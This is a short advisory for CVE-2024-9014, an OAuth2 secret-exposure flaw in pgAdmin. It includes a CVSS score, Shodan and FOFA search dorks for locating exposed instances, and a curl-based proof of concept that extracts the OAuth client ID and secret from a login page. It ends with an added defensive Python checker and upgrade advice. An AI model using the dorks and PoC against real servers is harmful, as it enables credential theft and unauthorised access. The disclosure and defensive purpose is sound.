CVE-2024-9014 pgAdmin Authentication Bypass
OAuth Flaw in pgAdmin leads to Authentication Bypass with severe data breach impact.
About pgAdmin
pgAdmin is the most popular and feature-rich Open Source administration and development platform for PostgreSQL, the most advanced Open Source database in the world.
Shodan Mapping
Dork: http.title:"pgAdmin 4"
Total IP: 5,277
FOFA Mapping
Dork: "pgadmin4"
Total IP: 27,018
CVE-2024-9014
pgAdmin versions 8.11 and earlier are vulnerable to a security flaw in OAuth2 authentication. This vulnerability allows an attacker to potentially obtain the client ID and secret, leading to unauthorized access to user data.
Impact: Severe Data Breach
CVSS Version 3.x
Base Score: 9.9 CRITICAL
Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
Nuclei Template
https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-9014.yaml
Proof of Concept by EQSTLab
curl "[URL_TO_TEST]/login?next=/" | grep -o '"oauth2Config": \[.*\]' | sed 's/"oauth2Config": //'
If the PoC above does not work, explicitly add the curl option -k to disable server certificate verification:
curl -k "[URL_TO_TEST]/login?next=/" | grep -o '"oauth2Config": \[.*\]' | sed 's/"oauth2Config": //'
Mitigation
Update pgAdmin to the latest version
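To confirm that an instance you administer no longer exposes these fields after updating, the following added example (not part of the original post or the EQSTLab PoC) parses a saved copy of the login page and reports which sensitive key names are present, without printing their values. It assumes the embedded JSON uses the key names from pgAdmin's OAUTH2_CONFIG setting; the sample pages and the "langOptions" key are constructed for illustration.

```python
import json
import sys

MARKER = '"oauth2Config":'
# Key names as used in pgAdmin's OAUTH2_CONFIG setting; assumed to appear
# unchanged in the JSON embedded in the login page.
SENSITIVE_KEYS = ("OAUTH2_CLIENT_ID", "OAUTH2_CLIENT_SECRET")

# Constructed sample pages (placeholder values, not captured from a server).
SAMPLE_EXPOSED = ('<script>var cfg = {"oauth2Config": [{"OAUTH2_NAME": "github", '
                  '"OAUTH2_CLIENT_ID": "EXAMPLE-ID", "OAUTH2_CLIENT_SECRET": '
                  '"EXAMPLE-SECRET"}], "langOptions": ["en"]};</script>')
SAMPLE_CLEAN = ('<script>var cfg = {"oauth2Config": [{"OAUTH2_NAME": "github", '
                '"OAUTH2_DISPLAY_NAME": "GitHub"}], "langOptions": ["en"]};</script>')


def extract_oauth2_config(page):
    """Return the oauth2Config list embedded in the page, or None if absent."""
    pos = page.find(MARKER)
    if pos == -1:
        return None
    idx = pos + len(MARKER)
    while idx < len(page) and page[idx].isspace():
        idx += 1
    try:
        # raw_decode parses exactly one JSON value, so a later "]" on the same
        # line cannot be swallowed the way a greedy \[.*\] pattern would.
        value, _ = json.JSONDecoder().raw_decode(page, idx)
    except json.JSONDecodeError:
        return None
    return value if isinstance(value, list) else None


def exposed_fields(page):
    """Map provider name -> sensitive keys present with a non-empty value."""
    findings = {}
    for entry in extract_oauth2_config(page) or []:
        if isinstance(entry, dict):
            leaked = [k for k in SENSITIVE_KEYS if entry.get(k)]
            if leaked:
                findings[str(entry.get("OAUTH2_NAME", "<unnamed>"))] = leaked
    return findings


if __name__ == "__main__":
    # Reads a saved login page on stdin; prints key names only, never values.
    result = exposed_fields(sys.stdin.read())
    for provider, keys in result.items():
        print(f"EXPOSED provider={provider} keys={','.join(keys)}")
    sys.exit(1 if result else 0)
```

The script exits with status 1 when a sensitive key is found, so it can gate a post-upgrade check; if it still reports an exposure after updating, rotate the affected OAuth2 client secret with the identity provider.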
References
[1] https://nvd.nist.gov/vuln/detail/CVE-2024-9014
[2] https://github.com/EQSTLab/CVE-2024-9014